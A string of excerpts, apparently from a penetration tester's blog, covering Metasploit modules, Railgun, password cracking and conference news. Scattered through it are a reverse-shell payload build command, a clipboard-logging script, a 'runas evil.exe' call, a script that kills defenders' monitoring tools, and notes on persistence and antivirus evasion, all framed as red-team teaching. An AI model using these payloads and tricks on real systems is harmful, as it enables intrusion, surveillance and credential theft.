The first P is Presence. It is first because the attacker needs to get a sense of what he/she has got before they move on.

Submitted it to MSF via pull request here: https://github.com/rapid7/metasploit-framework/pull/538
Added to trunk: https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/tcpnetstat.rb
I promised this one a while ago, sorry for the delay. This only does TCP, it’d be trivial to do UDP as well but never really found anything interesting and actively going on on the UDP side. It’s real simple, first we’ve gotta add the GetTcpTable function to railgun:
session.railgun.add_function('iphlpapi', 'GetTcpTable', 'DWORD', [ ['PBLOB', 'pTcpTable', 'out'], ['PDWORD', 'pdwSize', 'inout'], ['BOOL', 'bOrder', 'in'] ]) Then gauge the size of the table:

Was messing with the Windows service binaries in Metasploit today and I noticed something unique I hadn’t noticed before. For the PSEXEC module, the service name (actually just the display name, ‘service name’ is random) always started with an uppercase ’M’.
Curious to why that was I looked and found Line 246 of the PSEXEC module to be the culprit:
I can guess why the M is there. Might be just a quirk with old Windows versions that didn’t allow lowercase service names, not sure.

Penetration Testing / Red Teaming requires the use of a lot of tools. I don’t mind getting called a “script kiddie” because I can accomplish more and faster when I don’t have to code every single task I need to do. This post is to point out companies that make this possible and give a small bit of thanks.
(If you’ve ever tried to convince a company to give something away for free, you can understand how big this really is) Some give a lot, some only one tool, but even one is more than some.

One of the powers of Metasploit is it’s ability to stay memory resident. Through the use of reflective DLL injection even keeping new functionality the attack loads from ever touching disk. Well, the first thing I wanted to do with Mimikatz is get to that same level.
Here is my first step to that end; a railgun based Meterpreter script. Now before going all reflective with it I needed to understand how the DLL worked.

I found a number of things interesting when reading the following post:
http://www.offensive-security.com/vulndev/freepbx-exploit-phone-home/
Too bad that nmap’s interactive mode was taken out, but there are a great number of other such methods, most notably VI’s shell mode. But when I started looking into appending or inserting lines into /etc/sudoers for CCDC, I happened upon an interesting function of that file. Near the end of the file there are two lines:

If you have never heard of PhantomJS ( http://phantomjs.org/ ) before, it’s a “Full Web Stack with No Browser Required”, basically it a GUI-less browser. One of the magical “example” files that it has is called “rasterize.js”
Rasterize.JS essentially renders a URL, screen shots it and give it to you in a number of different formats, here’s it’s usage:
Usage: rasterize.js URL filename [paperwidth*paperheight|paperformat] paper (pdf output) examples: "5in*7.5in", "10cm*20cm", "A4", "Letter" PhantomJS is sweet for sweeping a ton of IPs and suspected HTTP/S sites, and look through a gallery of them to start figuring out which looks the most interesting… and we are going to essentially just that, except from a Victim machine.

At CCDC, Sticky Keys via RDP was a very successful re-entry point for the Red Team. You can read more about how this works here:
http://carnal0wnage.attackresearch.com/2012/04/privilege-escalation-via-sticky-keys.html
So if you can get physical access or SYSTEM/Admin access at some point and enable + reach RDP, you can very easily follow those instructions and gain a level of persistance without the need of a pesky password :-)
However, this doesn’t work so well with the advent of NLA or Network-Level-Authentication, which was enabled for Vista systems and beyond.

@egypt and I have teamed up this year to teach at DerbyCon at the end of September. Here is the very basic outline of the class and subject to change:
(Sign up here: https://www.derbycon.com/training-courses/ )
THURSDAY
Intro to the Framework The history of the Framework Ninja Demo Usage Recon Exploitation Pillaging Post modules Intro to Ruby Getting your environment set up Ruby Basics Strings, Arrays, and Methods oh my IRB, Pry - The No-Spoon Portion Navigating Documentation Module Writing Auxiliary Modules Exploit Modules Post Modules Railgun (Windows and ?

A friend of mine is presenting at phDays in Moscow at the end of May. If you are in the area, or can be, I would highly recommend you attend, and in particularly his talk.
His blog is here: http://blog.gentilkiwi.com/
And since a picture is worth a thousand words:
You should really go check out what he is going to present… just sayin’

Since this is a constantly updating slide deck I figured I’d post it here so I didn’t have to keep emailing it out. ;-) If you have comments or if something is wrong grammatically, technically or in any other way I’d love input. Suggestions also welcome.
Here is a link straight to the doc if you want to comment or add it to your google docs list: https://docs.google.com/presentation/d/1pPXLg3KqwSMLRCNRfows5QnVI2mLjSmll5vN2WHMFJg/edit

I have been using the LNK trick I talked about in my last post for a while, but always needing a Windows machine to create the LNK file. When I decided to write a post about it, I wanted to put the stipulation for myself that I would finally develop a way to get it done with out having to lug around a VM or spin one up every time I needed to change it’s target.

*TL;DR:* SMB Relay + LNK UNC icons = internal pentest pwnage
I need to touch on the highlights of two vulnerabilities before we talk about the fun stuff, but I highly encourage you to read the references at the bottom of this post and understand the vulnerabilities after you are done with my little trick, as you might find one of your own.
MS08_068: http://www.cvedetails.com/cve/CVE-2008-4037/
In 2008, Microsoft released MS08_068 which patched the “SMB Relay” attack.

This is my talk that I gave at ShmooCon 2012. It was a great honor to be given the chance to speak at ShmooCon as it has been my second home since 2006 (missed the first one… havent missed one since)
A @textfiles approach to gathering the world's DNS from Rob Fuller

A number of times during tests I’ve actually run into those mythical creatures called “patched windows machines”. At DerbyCon Chris Gates and I released the “Ask” post module (which I had failed to publish). This module very simply uses the ShellExecute windows function.aspx”) via Railgun with the undocumented (but very well known) operator of ‘runas’. These two lines accomplished that:
client.railgun.add_function( 'shell32', 'ShellExecuteA', 'DWORD',[["DWORD","hwnd","in"],["PCHAR","lpOperation","in"],["PCHAR","lpFile","in"],["PCHAR","lpParameters","in"],["PCHAR","lpDirectory","in"],["DWORD","nShowCmd","in"],]) client.railgun.shell32.ShellExecuteA(nil,"runas","evil.exe",nil,nil,5) This would quite simply prompt the user with that annoying UAC prompt asking the user to run ‘evil.

Since it’s Christmas and all, I thought I’d post the code snippet from my Hak5 segment a bit early:
#include <Clipboard.au3> #include <File.au3> $oldclip = "" While 1 $clip = _ClipBoard_GetData() If $clip <> "0" Then If $clip <> $oldclip Then _FileWriteLog(@UserProfileDir & "clip.log", $clip) $oldclip = $clip EndIf EndIf Sleep(100) WEnd It’s pretty straight forward, and I welcome everyone to install AutoIt3 and compile/run the above script to see what it does (although most of you I’m sure can figure it out just by reading it).

When Google Reader decided to remove everything it was good for, we all scrambled to find new homes for things we wanted to share. Tumblr became a place that most of us flocked. I’ve found Tumblr to be not a very good substitue for Google Reader’s functionality (IMHO).
The other day, carnal0wnage told me about a service called ‘Buffer’, and all this thing does is do scheduled tweets, but it has one distinct feature, not only is it focused around the sharing of links, it works (if you install the browser plugin/extension) INSIDE OF GOOGLE READER ;-) So you can be reading a feed item, push a button and not have to open a page or another app, it’s pretty much all right there.

Pentest Monkey is a great resource for a lot of things. One of which is this:
John The Ripper Hash Formats | pentestmonkey
I used it, plus a bit of bash fu to try to figure out some hashes that I was trying to crack.
Step 1: Create file of supported hash types. For me, that was simple I just threw the following in ‘supported_types.txt’ in the same directory as john.

This Christmas I’ve decided to spread a little cheer (aka free stuff) ;-) , and I’m doing it in 2600 fashion. Now, I don’t know if I have enough readers to pull this off, but here goes:
I will be sending 1 No Starch book of the winner’s choice each day for 12 days starting on December 1st. Here’s the catch. To win the books you must submit a picture of a door or room that is unmistakably ‘Room 362’.

Jcran recently blogged about an easy way to run a post module on all sessions:
http://blog.pentestify.com/simple-framework-domain-token-scanner
msf> use post/windows/gather/enum_domain_tokens msf enum_domain_tokens> irb framework.sessions.each do |session| run_single("set SESSION #{session.first}") run_single("run") sleep 1 end You use the POST module, drop to IRB and run those 4 lines, and bam, you win. With resource files we can automate this a bit more and have it so that we do this effortlessly with any post module.

In @carnal0wnage and my presentation at DerbyCon 2011 we talked about using SCREEN and SCRIPT to keep connections live / use them across SSH sessions, and log everything that happens. What we didn’t cover is the fact that there isn’t a time stamp for those logs. Now, Metasploit has multiple ways of creating logs:
cat ~/.msf4/logs/framework.log This log automatically logs all of the error data that is great for trouble shooting when something is working, but doesn’t record what you are doing inside of msfconsole msf> spool ~/myclient.

On Vista and above there is a Windows ‘Redirector’ (A redirector is basically a Symlink or fake directory that’s there but not in Windows) (more info here.aspx”)) that allows a 32bit process create a 64bit one. For anyone who has tried to run ‘execute -H -c -f notepad.exe’, they know that if they are in a 32bit process, they get a 32bit notepad even if they are on a 64bit system, which is annoying.

Chris Gates (@carnal0wnage) and I will be speaking at DerbyCon next week:
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
“This talk is about methodologies and tools that we use or have coded that make our lives and pentest schedule a little easier, and why we do things the way we do. Of course, there will be a healthy dose of Metasploit in the mix. “

Say you go for the 500+ shells on an internal test or your phishing exersice goes way better than you thought. Well you need to get your bearings quickly and going into each shell and doing a ps, then looking through the list for all the users logged in is a bit of a pain and defintely not ideal.
I wrote a quick script that you can throw in the meterpreter scripts folder to aide you a bit with this:

This doesn’t really apply to Windows users as you can just close puTTy. But for everyone else, stalled SSH Sessions suck. You are either slamming enter to get it to realize it’s been disconnected or just waiting for it to. Well, for those of us who are impatient just hit:
~. Thats right, SHIFT + the key above TAB, release, and hit the period. You may have to hit ENTER first to clear the buffer or whatever it does, but do that and it will disconnect the SSH session right away.

John the ripper only takes one word list at a time. There are plenty of docs out there that show you how to cat all of your dictionaries into John’s stdin function but I like to run rules against my lists and I didn’t see any how-tos on doing this. Here is my way:
ls dicts | xargs -t -I file ./john --pot=victim.pot --format=mscash --wordlist=dicts/file --rules victim_cachedump.txt
This command will ls the ‘dicts’ directory, pipe it to xargs, which will spit out the command it uses for each itteration (-t) and replace every time it see the word file with the line/itteration its on (-I).

I’ve had a private list of commands that I run on Windows or Linux when I pop a shell, as I’m sure most pentesters do. It isn’t so much a thing of hoarding as much it is just jumbled notes that are ‘not worth posting’
Well, I made two (now 3) public google docs (anyone can edit) *don’t be a dick clause
Linux/Unix/BSD Post Exploitation: https://docs.google.com/document/d/1ObQB6hmVvRPCgPTRZM5NMH034VDM-1N-EWPRz2770K4/edit?hl=en_US
Windows Post Exploitation: https://docs.google.com/document/d/1U10isynOpQtrIK6ChuReu-K1WHTJm4fgG3joiuz43rw/edit?hl=en_US

I am way late to the game on this, but if you have a blog, a twitter handle, or even better (in this specific case) a CISSP, please support Wim Remes (@wimremes), as he has submitted to become a member of the (ISC)2 Board of Directors.
On twitter use the hashtag: #wim4board
Lets help the certifications, especially the one with so much corporate/gov acceptance, get better.
His petition: http://blog.remes-it.be/petition.html
Other supporters:

Update 1: No this doesn’t need to be in memory since you control the system but it was a fun challenge
Update 2: The info from the ‘adduser’ payload says ‘Create a new user and add them to local administration group’ - I’m guessing since I ran this on a DC is why I didn’t notice this but it is something to keep in mind when running this script.
Update 3: Here is a powershell way of doing things from a CSV, you can do some passwords in the CSV and keep it for reference too.

I saw a post back in June and it just recently came up again:
http://www.securityartwork.es/2011/06/01/dns-port-forwarding-con-meterpreter/
It looked like a lot of hard work to set that up and I’m really lazy. I didn’t want to have to go through all that every time I got onto a new network. So, I made a very simple meterpreter post module to just call a Windows API key called ‘gethostbyaddr’ using Railgun.
TL:DR; You can download the post module here: ipresolver.

One important thing to note about Railgun is that you are querying the API and just as if you were using C++ the API you are calling just might not be there on the system you are trying to call it on. So here is a quick trick to find out if a the function (API) that you are trying to call is available to you:
For my example I’m using ‘getaddrinfo’ since it’s life in Windows is somewhat odd.

Also known as “How to practice what we preach”. I don’t know how long I’ve been telling clients that they need to have a minimum password length of 15 characters to make it so there is no chance LM will be stored (and a cursory bonus that their password won’t be close to their original). But I’ve never tried setting it myself. Well, a client called me out. You can’t! (well at least not through the UI )

This series was interrupted a bit by the new Metasploit HTTP/HTTPS payloads (more info). Definitely not complaining though as the new features *(as will be discussed in part 2) are some epic new additions to the payloads list. However an important change happened while the craziness over the new payloads was going on. ScriptJunkie snuck in an awesome change to msfvenom (a.k.a. msffsm).
Here is the link to the ticket about the change (link) and the revision (r13057)

I’ve been cracking passwords for a while and use a myriad of tools in a certain order to get the job done. I find that Cain is still my Go-to for allowing me to visualize the process and do some basic sorting (really wish I could search in-app). But I’ve been asking around on twitter some questions like Why is GPU cracking for 50k hashes faster than Rainbow Tables (most say the bottleneck is the HDD read style and speed) and many asked what all of my compalints are so I figured this would be the best place (vice multiple emails)

I missed the 3 year anniversary of NoVA Hackers but I did want to make a post about it since we are still going strong and are now at ~150 active members.
Chris Gates and I started this thing together back in October of 2008 which spawned off of Chris’ idea to start a AHA (Austin Hackers Association)-like group in NoVA. It’s ideals merged with the already going NoVA Security Luncheons that I was throwing in Reston VA and DC was where it all started.

Nick Harbour wrote a post on Mandiants blog about some Malware that was using a dll called ‘fxsst.dll’ to hide and stay persistent on a system. The DLL is used by Windows when it is acting as a Fax server (anyone still do that?). He mentions some very interesting points:
The DLL gets loaded at login by Explorer The DLL exists in System32 but is looked for in Windows first Explorer doesn’t try to use anything inside of it via exports unless the system is acting as a fax server (aka safe to put a pretty bland DLL there) I thought… no it couldn’t be that simple… lets see:

In Part 1 I gave an example I used at CCDC with the single ‘windows/download_exec’. One of the down sides of that payload is you need to host the binary, giving up an IP/host that can be blocked. Well, Google recently (a couple months ago) allowed people to upload ‘anything’ to Google docs. And you can then share these files publicly. Probably already see where I’m going with this, but here are some steps to get it going, first upload your malicious binary (not the dropper ‘windows/download_exec’, but the file it needs to execute).

Payload selection is something that rarely gets talked about in detail. Most PoCs just use calc.exe, netcat, or some kind of socket. The vast majority of Metasploit tutorials, videos and documentation use the _windows/meterpreter/reverse_tcp_ payload which is only one of 224 possible payloads. Here is a little disclaimer: While the payloads in Metasploit don’t get updated as much as other parts of Metasploit, this is a point in time documentation of them (June 23, 2011) and the payloads available in Metasploit are constantly changing.

Just a follow up to my previous post. One of the things that sets that method apart is the fact that the suspension (once the DLL injection occurs) comes from within the process, and it suspends all the child processes as well.
Another way you can do this without the injection is just sending a suspend to all the threads in the process.
pid = 2980 targetprocess = client.sys.process.open(pid, PROCESS_ALL_ACCESS) targetprocess.

Recently Didier Stevens wrote ‘Suspender.dll’ which is a DLL that will suspend a process and all of it’s child processes after a delay. 60 seconds is it’s default but you can rename the DLL to add a number (as such ‘Suspender10.dll’ for 10 seconds) to make the delay whatever you wish. You can find the blog post and download here: http://blog.didierstevens.com/2011/04/27/suspender-dll/
Jonathan Cran and I had the same idea, as I’m sure many others did as well.

When trying to dump password hashes on a Windows 2008 R2 64 bit box I constantly run into the “The parameter is incorrect” error in meterpreter. So I’ve had to fall back on dropping binaries which I really don’t like doing because of the added clean up and chance of getting ‘caught’. Well, with a bit of migration you’ll be back to passing the hash. Here is how, with a bit of the thought process first:

Original Post: http://blog.nvisiumsecurity.com/2011/04/exploitable-mobile-app-challenge-now.html
You can read the details on the above link, but it boils down to you make an application for iPhone or Android. You make it vulnerable to X,Y,Z types of flaws, you win a 32gb iPad or a Motorola Xoom.
Added bonus, all the apps get submitted to OWASP for people to learn Mobile security.

Chris Gates wrote a blog post about the ‘getvncpw’ meterpreter script. I ran into the same issue on Penetration Tests in the past but didn’t know much about the wacked out version of DES that RFB (the VNC protocol) was using. Not being a fan of manually editing a binary and compiling each time I had a password to crack I wanted to find another way, but didn’t get a chance to.

One of the best ways to throw blue teamers off the scent of another host getting owned, which also has the added effect of stressing them out is a batch script that runs through some of the more annoying features in nircmd.exe in succession and at regular intervals:
http://www.nirsoft.net/utils/nircmd.html
setdisplay 640x480 killprocess taskmgr.exe killprocess procexp.exe win -style title “my computer” 0x00c00000 win child title “my computer” +exstyle all 0x00400000 win +exstyle title “my computer” 0x00400000 win trans ititle “internet explorer” 256 win close class “CabinetWClass” multiremote copy “c:tempcomputers.

Not sure how far back it goes (Win95?) but 2000, XP and all the way up to Win 7 have a program called DOSKEY:
C:\Users\vmadmin>doskey /? Edits command lines, recalls Windows commands, and creates macros. DOSKEY [/REINSTALL] [/LISTSIZE=size] [/MACROS[:ALL | :exename]] [/HISTORY] [/INSERT | /OVERSTRIKE] [/EXENAME=exename] [/MACROFILE=filename] [macroname=[text]] /REINSTALL Installs a new copy of Doskey. /LISTSIZE=size Sets size of command history buffer. /MACROS Displays all Doskey macros. /MACROS:ALL Displays all Doskey macros for all executables which have Doskey macros.

Constant connections and odd binaries running on systems usually get caught pretty quickly in CCDC events. However, NFS exports are hardly ever noticed. Setting it up on an Ubuntu/Debian box is a snap and given the right directory and permissions can lead you right back to getting shell any time you want without a constant connection. Plus, NFS blends right in and can listen on TCP and/or UDP (2049)
Here is a quick how-to on setting up NFS

(No I’m not old enough to have used that term when it was the standard)
I believe that this tweet should be archived for reference:
http://twitter.com/#!/_ming_se/status/37688231185219584
And for those who don’t get the reference, here is a Pontiac Fiero:

The following are good adds to your DNS brute force list:
These are all SRV records so make sure your type is set correctly. The great thing about SRV records is that it tells you the port in the answer. Isn’t that nice of them?
I don’t know of any DNS tools that utilize SRV as part of their process, but scripting dig to do so isn’t tough.
_autodiscover._tcp _caldav._tcp _client.

This day and age everyone is worried about the insider threat. Internal Penetration Testing doesn’t really test what would happen if your janitor got paid 50 bucks to put a USB stick in one of your servers. External Penetration Tests are never scoped for that sort of testing. So what is a company to do? How can they know what the risk is? The answer? Usually they guess or assume. Mostly because they are scared to find out, it’s happened to them before, or one of a million different justifications.

[UPDATE] This module (enum_delicious) has been pulled from Metasploit since Delicious no longer allows searching by site.
In the last post I showed off how Archive.org’s Wayback machine can be used to pull urls for a domain, another place where URLs are stored and can be searched by domain is Delicious.com (a bookmarking service). I’ve seen people bookmark everything from internal web portals to urls with special no-auth passwords in them.

Archive.org allows you to check the history of sites and pages, but a service most are not aware of is one that allows you to get a list of every page that a Archive.org has for a given domain. This is great for enumerating a web applications, many times you’ll find parts of web apps that have been long forgotten (and usually vulnerable).
This module doesn’t make any requests to the targeted domain, it simply outputs a list to the screen/or a file of all the pages it has found on Archive.

Most malicious IP lists focus on the client side threat, where servers (hosted or exploited) host client side exploits or evil scripting.
These don’t really help the server admins very much. Project Honeypot does an amazing job at keeping detailed information on scanners / harvesters and brute forcers, the likes of which are the daily enemy of said admins. They offer a service called HTTP Block List or ‘HTTP:BL’.
Another way this list differs from the rest is it isn’t a list you can download.

This is definitely not my content, but I did want to highlight the talk Nicholas [1] gave at NoVA Hackers [2] this last November.
Nicholas B. gives a talk about SSH Patching for Offensive and Defense at NoVa Hackers November 2010
[1] http://twitter.com/nberthaume
[2] http://novahackers.blogspot.com/2010/10/november-meeting-monday-nov-15th-2010.html

Uninstallation is not new
Deleting and removing things on a box you own isn’t new
This method and how to do it remotely was posted in Feb 2007
But I didn’t know how to do it, and I thought it was hilarious, so I made a video:

“There is no stupid question” but, if it doesn’t meet this checklist, it’s officially a time wasting one.
Acceptable questions checklist:
1. Have I tried it
2. Have I checked the manual, wiki, or forum
3. Have I googled and searched for an answer
All marks must be achieved before a question is asked unless the target of the question is getting paid to answer the source’s inquires “Have I tried it” mark can only be skipped in the case of life threatening actions PDF version is available upon request.

Revenge of the Bind Shell from Practical Exploitation on Vimeo.
BACKGROUND At the April 2010 NoVA Hackers meeting I discussed some of the offensive uses of IPv6 on current networks. Well, around that time Microsoft issued a patch to all of the supported versions of Windows that broke my methodology. Obviously I wasn’t the only one doing this ;-)
Before I get ahead of myself lets explain what Teredo is.

This is part one in a series of presentations I will be giving at the NoVAHackers meetings on forensics of all kinds as it can be leveraged in a penetration test.
Memory Forensics for Pentesters: Firefox from Rob Fuller

When you first step on a machine, you want to determine quickly if you are just a user or an administrator. Meterpreter doesn’t have a way to quickly check this. You could drop to a shell, check the local users group “Adminitrators”, and check your user, and correlate any groups that are shared between the outputs. You could do ‘getsystem’ and if one works other than Kitrap0d. You could also just do a ‘ps’ and notice that you can see ‘SYSTEM’ processes.

Exploit modules inside of metasploit don’t have the ability to run on multiple hosts with one swing of the bat. So I created some code to facilitate that. It’s really not much but there are some really juicy pieces of knowledge I learned on the way here.
// The following is a resource file, but instead of just giving you something to download or straight copy and paste, I’ve broken it up into sections.

Ask any developer and they will tell you that the age of a project is not calculated in calendar time, but in worker hours or “commits” to a project. The Metasploit Framework hit 10,000 today.
With the project dating back to 2003, much before the official “Revision 1” happened, there have been a lot of changes. Going from the initial incarnation as a network “game” written in perl to the world largest ruby project, the framework has seen it’s fair share of blood, sweat, and tears.

Back in 2009 the “ikee” rick-rolling worm went around the iPhone world via the password of ‘alpine’ on the root account. You are now warned to change your root password when you pop into Cydia and Rock the first time. But this thing just wont stay down.
If you have jailbroken your iPad you might want to check out a little file called “master.passwd”. In it, there is another user called ‘mobile’ which has been pointed out since 2008 (here) on the iPhone as another account to change the password of.

Ever set up a multi/handler and get an odd IP hitting it? Probably forgot about it as internet chatter? Think again, you might have just been caught
AV Tracker - http://avtracker.info/ is a site that tracks the different IP addresses, hostnames, computer names and user agents that AV and other “Submit-your-malware-here” drop boxes use.
Peter Kleissner and his team provide
ranges that the hosts use a dynamic text file with the IP addresses listed if you want to add it to some auto updating block list a line by line IPTABLES block config and even C code to add into your binary to make sure it doesn’t talk out from one of those addresses (I could be reading it wrong, still a beginner in C) The team has been criticized a lot by AV vendors, enough so the took down the site in January of this year.

Metasploit’s Railgun is awesome, but getting things to work correctly can be a pain. Here are some of the resources that have helped me out:
System Error Codes.aspx”) - This is hands down the best resource you have, it will tell you what that stupid “5” or “1314” means in your return value. Keep this tab open to circumvent crazed bovine attacks.
theForger’s Win32 API Programming Tutorial - A really good place to start when you are getting to know the Windows API and the frustrations that come along with it.

Back on June 13th, “Patrick HVE” released RAILGUN:
http://mail.metasploit.com/pipermail/framework/2010-June/006382.html
And it was merged into the the Metasploit trunk with 9709, 9710, 9711 and 9712: http://www.metasploit.com/redmine/projects/framework/repository/revisions/9712
Basically what this allows you to do is make Windows API calls from Meterpreter without compiling your own DLL. It currently supports a number of Windows API dlls:
iphlpapi ws2_32 kernel32 ntdll user32 advapi32 (You can find out exactly what functions are available by default in the api.

Certainly nothing to fuss over, but I’ve had a fascination with setting my target’s wallpaper as sort of a calling card for years now. I’ve been able to set the registry key (HKCUControl PanelDesktopWallpaper), but until recently I didn’t know how to get it to refresh so that it displayed without forcing the user to log out…
First, is the most important part, selection of the wallpaper. This is my first selection:

I was recently approached by savant, who told me that a bunch of my Twitpics had geo location in them. Larry Pesce from PaulDotCom has been doing research in this field for a while and each time he brings it up I casually checked a couple of my twitpics and came up empty handed.
But, he gave me exact references, so I went to Twitpic to check them out for myself.

*WARNING* if you use fgdump like I did, it extracts pwdump to %TEMP% at run time, which is detected by AV.
First of all, I was floored when this worked. Really AV? It’s that easy? Really?
So here is the break down, go get “Resource Hacker“… You’re almost done. Only 3 steps left. (1 of which is optional)
I started with fgdump, a well known hashdumping/pwdump tool. It’s detected by 80% of all AVs and by all the top 10.

Normally I save links for my “Mubix Links” blog to keep the clutter down on this one, but I think this is one that I would like to highlight as important. The NFO, credits and summary to this copyrighted video is what I wish to highlight.
http://thepiratebay.org/torrent/5573874/HackersWanted%282008%29
I am against the misuse of copyrighted material, and it is a violation of laws in many countries, including my own.
I really wish this video would have been published, I’m sure it would have been a very interesting video, that I definitely would have purchased.

The other day Chris Gates posted an excellent blog post about the WebDAV hotness that Chris Sullo (author of Nikto) cooked up (DAVTest) which Ryan Linn popped out a Metasploit module for.
Anyways, the story left off being a very limited user called “Network Service”. This user has Read and Execute, but no Write access, and a very limited field of view to boot.
meterpreter > getuid Server username: **NT AUTHORITYNETWORK SERVICE** Lets look around a bit.

I have an admittedly limited view of the exploit dev world. However, from what I’ve seen devs have very few options: (Please correct me if I’m wrong)
Responsible Disclosure Direct Contact => depending on the size of the vendor and their view on security, this could result in anything from a simple thanks, a reward, to a court hearing. Exploit Broker => possibly sell, possibly not, depends on the broker.

Practical Exploitation is going to be me, explaining things in the way that I see the world on the best medium for what I’m explaining, be it a short blog blurb, a video of me, a video of a desktop, or just audio. There is no schedule that I’ll be sticking to, but I will guarantee you 3 things though:
If you want it explained and it has to do with infosec or hacking (I’ll do my best on the hardware side), it will be on the show.

First of all, get Robert @RSnake Hansen’s RFI list here:
http://ha.ckers.org/blog/20100129/large-list-of-rfis-1000/
it’s a great list, but as soon as I saw it, I was like.. hmm.. how can I use that? Well, being that I am a Burp fan, I parsed the .dat with the following line:
cat rfi-locations.dat | grep -v "^#" | awk -F '?' '{print $1}' | sort -u > rsnake_list.txt This pulls his list down to 906 entries which you can load in to Burp and hammer away with Intruder.

This is far from a new idea, however it’s not something that is easily provable. So I had an idea this morning. I posed the following question on Twitter:
You know what I got in return? a resounding “No” from everyone. (well I had one outlier but, who doesn’t when you are trying to apply science to prove art) I challenge you to name another non-artistic career that people are so passionate about that they would stay in it even if they won the lottery.

I was recently on the grmn00bs podcast, I had a great time, and I can’t wait to see who they pick up next on their series:
grmn00bs podcast: episode 9
Update Archive.org Link
“When they were n00bs Series”
Show Notes:
hak5 is one of the original security shows. Rob has been featured on several segments.
Twit Netcast Network with Leo Laporte is another show that’s been around for a while.

If you hadn’t noticed, LinkedIn has started allowing you to link your Twitter account to your LinkedIn account. So, I didn’t know this (since I opted out), but apparently LinkedIn will kick your status updates to Twitter… like when you get a new job…
Privacy settings out the window! Woohoo for Web 2.0!

So yesterday (December 14th, 2009) HD Moore posted a tweet with a pic of the new VNC meterpreter script that he wrote:
Looking at the script I noticed that it created a new connection (two connections outbound). Well it was the perfect excuse to take the newly refurbished portfwd command for a spin.
https://github.com/mubix/stuff/blob/master/metasploit/vnc_oneport.rb
Or you can get it via the SVN at Revision 7872
By creating a bind payload instead of a reverse connect we can have the payload listen locally.

UPDATE: if you don’t make some additional steps, the ‘rvm 1.9.1’ command only is active for the current console session. See the site for details: http://rvm.beginrescueend.com/
This short tutorial is how to get Ruby 1.9.1 on BT4 or any other Linux distro with the tool ‘rvm’ (Ruby Version Manager).
The Metasploit team has put a lot of work into getting the framework to work well with 1.9.1 and still work with earlier versions.

If you haven’t seen it all over twitter yet, achillean released the “beta” of SHODAN yesterday. It’s a search engine of basically a nmap of the internet (ports 21, 22, 23 or 80 so far).
http://shodan.surtri.com/
You can search by keyword, and/or using any of the advanced search options.
country: 2-letter country code hostname: full or partial host name net: IP range using CIDR notation (ex: 18.7.7.0/24 ) port: 21, 22, 23 or 80 Here is just a taste of the power this bring to the game:

Idea came thanks to cktricky from: http://cktricky.blogspot.com/
A bunch of sites on the web give you different pages depending on the browser you use to view it. I know when I was a web developer compatibility was the bane of my existence, as I’m sure it still is for all the web devs out there. Well, sometimes this leads to bad coding practices, or even the old “Google Bot gets to see everything” feature.

We (the security community) all know, and make fun of “Users”, and “Admins”. They are derogatory terms in our community. So much so, that they could almost be classified at curse words. (I can see the XKCD now: Security stick figure talking to IT stick figure. “You stupid A****“).
While I neither discount their “contribution” to making my day fun, I feel that a lot of people miss an even bigger threat: Policies and Procedures, or SOP (Standard Operating Procedures).

Disclaimer: I was given a demo license of the new free business product to break/review. No money has traded hands. This is my brutally honest opinion of the product.
I’ve played with a gambit of Astaro products, and personally I really hate UTMs, just like I do All-In-One Printer/Copier/Faxes. One thing breaks, they all do. However, Astaro’s .. before I go into my opinions of the product, or get on any soap box, here are the facts:

(This post got lost in the intertubes and it took a bit to get back, Archive.org nor Google cache had it)
I get this question all the time: “Why room362.com?” I have answered that question in a lot of ways, depending on the perceived amount of time I had to tell the story. But, on a blog you have tons of time, right? Not if you are studying the Twitter boom.

In Revision 7315 of the Metasploit Framework (SVN) a new option was added to MSFENCODE. Technically you always had the ability to do the following, but it required a bit of knowledge of the inner workings of the framework.
But before I get into the new feature, lets quickly go over the standard way you use msfencode:
root@bt4:/pentest/exploits/framework3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.92.131 LPORT=443 R | ./msfencode -t exe -o /tmp/bob.exe [*] x86/shikata_ga_nai succeeded with size 318 (iteration=1) root@bt4:/pentest/exploits/framework3# We just used MSFPAYLOAD to output in [R]AW format, a reverse tcp connect meterpreter payload.

Continuing my “Getting your fill of” series
Dave Shackleford recently posted an excellent blog entry titled “One for the n00bs”: http://daveshackleford.com/?p=277
It relates the security community to a high school cafeteria. It’s a good read and pretty dead on. I want to echo his sentiments, “I got my OWN lunch table. And you’re invited.”, I”m just an email away. I also wanted to let you know there are a lot of places where you can learn on your own, at your own pace, and without any chance of ridicule.

I created a google group for the NoVA Hackers meetups (Formerly known as NoVASec Luncheons)
I have added some permissions to the group to maximize privacy options while still allowing for interaction other than me sending out BCC’d messages to everyone:
Private Invite Only - basically to keep spam out
Only Managers can view Member List - so those who want don’t want their email addresses seen can join and just listen for announcements and regular message traffic

I had a bet with my friend about getting #1 on the Crazy Taxi high score page (== motivation for this post).
For those who have not been introduced to it yet, it’s a Facebook/Flash/2.0 resurrection of a much older game.
Not having extreme timing skills, I quickly gave up on getting the 2,000,000 points required to make it the “normal” way: My first try was modifying the outgoing HTTP traffic using the Tamper Data plugin for Firefox (to catch the obvious ones).

Yes, I just called everyone who works at Apple an Oompa Loompa, but I digress:
I was reading Brooke Crothers’ story on the Apple ‘gag’ order [1] and couldn’t help but think of how Apple has created an almost similar situation. Everyone wants to know what Apple is up to, can’t stop talking about it. Buzz Out Loud [2] even had people call and email asking them to see if they could do a show without mentioning Apple or the iPhone.

I’ve been debating making this kind of post for about a week, and I apologize for the RSS spam. But it was getting a bit repetitive telling people via DM, email or other communication what happened.
When I took my hiatus from Twitter, I zero’d out my followers, so, if you care to, please check to see if you are still following me. I will be watching my follows closely and will refollow people I might have missed in my initial run through.

CKTricky over at http://cktricky.blogspot.com has been running an awesome Burp Tip of the Day series on his blog. After seeing him use Nikto through Burp. I decided to see if I could just export the list of checks to a text file so that I could use them over and over in Intruder. After a bit of awk and sed hell I figured it out, and submited it to him for acceptance to his BTotD series.

So this is a pretty crafty way of getting packet captures on a target system. Definitely could be streamlined with some meterpreter scripting fu, but awesome job on the video.
Metasploit meterpreter Windump/Winpcap sniffer from siles on Vimeo.

The site has been down for a while, there were a lot of factors that played into that, but mostly it was focus on some family, as I had some in town. I also came to the conclusion that it’s time to move to “the cloud” so I moved over to SquareSpace (using the coupon code: DEFCON </end shameless plug>). I have an actual web designer looking at hooking this thing up right.

